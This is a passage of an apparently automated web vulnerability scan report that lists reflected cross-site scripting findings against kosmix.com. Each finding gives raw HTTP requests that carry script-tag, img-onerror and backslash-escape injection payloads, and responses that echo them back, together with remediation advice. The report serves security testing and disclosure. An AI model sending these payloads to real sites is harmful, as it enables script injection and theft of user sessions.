Date: Sun, 15 May 2011 20:10:10 GMT
Status: 200 OK
Content-Type: text/html; charset=utf-8
ETag: "bab152486e5ccca7dc267ac0e34d24a1"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
X-Runtime: 0.103756
Set-Cookie: version=2; path=/; expires=Thu, 15-May-2031 20:10:10 GMT
Set-Cookie: _genome_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRiIlY2E2ZTNmNDFiNzJiODFhMzY1Yjg5NDcwNmE4YmI5YTJJIhRhYmluZ29faWRlbnRpdHkGOwBGbCsHmf6se0kiEF9jc3JmX3Rva2VuBjsARkkiMVNYY2pvSEVCQnNEVHhLTS9EN3ptcVdMN0hNUUp2RGVCUXBTTmRLbVVOZ1k9BjsARg%3D%3D--65608cc915d0028ef5c7ed0070394e6790f362d5; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: NSC_uc2.uxffucfbu.dpn=ffffffff0904168a45525d5f4f58455e445a4a422e50;expires=Sun, 15-May-2011 20:12:10 GMT;path=/
Content-Length: 32408

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<title>Detroit Lions @ Green Bay Packers (Week 4) - Live tweets </title>

<meta name="description"
...[SNIP]...
<div data-portlet-uid='79ae7' style=x:expression(alert(1)) e9cde0e431c' >
...[SNIP]...

4.14. http://www.kosmix.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb009"%3balert(1)//7588aa95cd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb009";alert(1)//7588aa95cd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?bb009"%3balert(1)//7588aa95cd8=1 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:00:48 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=f3875af0-615b-012e-f057-003048fe4cb2; path=/; expires=Sat, 15-May-2021 20:00:48 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:00:48 GMT
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:00:48 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:02:48 GMT;path=/
Content-Length: 15733

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

   
//set global search variables
   var searchParams = {};
   var stickyParams = {};
       searchParams["dynamic_modules"] = "";
       searchParams["v"] = "any";
       searchParams["qtitle"] = "";
       searchParams["bb009";alert(1)//7588aa95cd8"] = "1";
       searchParams["invasive_banner_ad"] = "";
       searchParams["urchin_id"] = "UA-2165955-1";
       searchParams["referrer_query"] = "";
       searchParams["q_lower"] = "kosmixhomepage";
       searchParams["a
...[SNIP]...

4.15. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c039\"%3b858e9844ad6 was submitted in the REST URL parameter 2. This input was echoed as 4c039\\";858e9844ad6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /c-javascripts/kapp_relevance.js4c039\"%3b858e9844ad6?1302816008 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; last_referrer=http%3A//burp/show/6; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:13:20 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:13:20 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:15:20 GMT;path=/
Content-Length: 16424

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ext/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "320636d0-615c-012e-b1f7-003048fe3090";
   kl.svid = "2005489664";
   kl.query = "Kapp+Relevance.js4c039\\";858e9844ad6";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.16. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /images/ck.txt

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72e65\"%3b8b72835fc4c was submitted in the REST URL parameter 2. This input was echoed as 72e65\\";8b72835fc4c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /images/ck.txt72e65\"%3b8b72835fc4c?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&ckid=1086031566&m=footer&r=1010200&c=1&ct=staticclick&x=806&y=923&v=29&p=site_footer HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:26 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:26 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:26 GMT;path=/
Content-Length: 16645

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ipt type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1295763866";
   kl.query = "Ck.txt72e65\\";8b72835fc4c";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.17. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de377\"%3bddcfd3a24de was submitted in the REST URL parameter 2. This input was echoed as de377\\";ddcfd3a24de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /images/favicon.icode377\"%3bddcfd3a24de HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:55 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:55 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:09:55 GMT;path=/
Content-Length: 16189

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ype="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1005347074";
   kl.query = "Favicon.icode377\\";ddcfd3a24de";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "";
   kl.build_id = '152138';
   kl.release_id = 'GAMMA.REL.BLD.20
...[SNIP]...

4.18. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /images/pv.txt

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 369b1"><script>alert(1)</script>373ea074d73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images369b1"><script>alert(1)</script>373ea074d73/pv.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&sv=1220494746&q=&sr=organic&br=Chrome&os=Windows&ur=http%3A//www.kosmix.com/&rf=&sw=1920&sh=1200&vw=1136&vh=945&v=29&rs=May+15+13%3A00%3A43.165997&bid=152138&rid=GAMMA.REL.BLD.20110412 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images369b1%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:47 GMT;path=/
Content-Length: 16872

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/images369b1"><script>alert(1)</script>373ea074d73/pv.txt"/>
...[SNIP]...

4.19. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e1a\"%3b7b368945773 was submitted in the REST URL parameter 2. This input was echoed as b8e1a\\";7b368945773 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/b8e1a\"%3b7b368945773/options_bottom-kosmix-sem-chimborazo-152138.js?1302902896 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:22 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:22 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:22 GMT;path=/
Content-Length: 16512

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1497877667";
   kl.query = "B8e1a\\";7b368945773";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.20. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb94e"><img%20src%3da%20onerror%3dalert(1)>2ad41685b89 was submitted in the REST URL parameter 2. This input was echoed as cb94e"><img src=a onerror=alert(1)>2ad41685b89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/cb94e"><img%20src%3da%20onerror%3dalert(1)>2ad41685b89/options_bottom-kosmix-sem-chimborazo-152138.js?1302902896 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:18 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:18 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:18 GMT;path=/
Content-Length: 16727

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Cb94e"><img Src=a Onerror=alert(1)>2ad41685b89 - options_bottom kosmix sem chimborazo 152138.js" />
...[SNIP]...

4.21. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c70d0"><script>alert(1)</script>0392b55a33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptsc70d0"><script>alert(1)</script>0392b55a33/cache/topic_bottom-kosmix-sem-chimborazo-152138.js?1303752733 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; last_referrer=http%3A//burp/show/6; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascriptsc70d0%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:19 GMT;path=/
Content-Length: 16422

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/javascriptsc70d0"><script>alert(1)</script>0392b55a33/cache/topic_bottom-kosmix-sem-chimborazo-152138.js"/>
...[SNIP]...

4.22. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b0dd\"%3b33f6859b5d was submitted in the REST URL parameter 2. This input was echoed as 5b0dd\\";33f6859b5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/5b0dd\"%3b33f6859b5d/topic_bottom-kosmix-sem-chimborazo-152138.js?1304862030 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:06:06 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:06:06 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:08:06 GMT;path=/
Content-Length: 16492

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "895175937";
   kl.query = "5b0dd\\";33f6859b5d";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.23. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c71"><img%20src%3da%20onerror%3dalert(1)>15a60d74c0c was submitted in the REST URL parameter 2. This input was echoed as 84c71"><img src=a onerror=alert(1)>15a60d74c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/84c71"><img%20src%3da%20onerror%3dalert(1)>15a60d74c0c/topic_bottom-kosmix-sem-chimborazo-152138.js?1304862030 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:06:03 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:06:01 GMT
Vary: Accept-Encoding
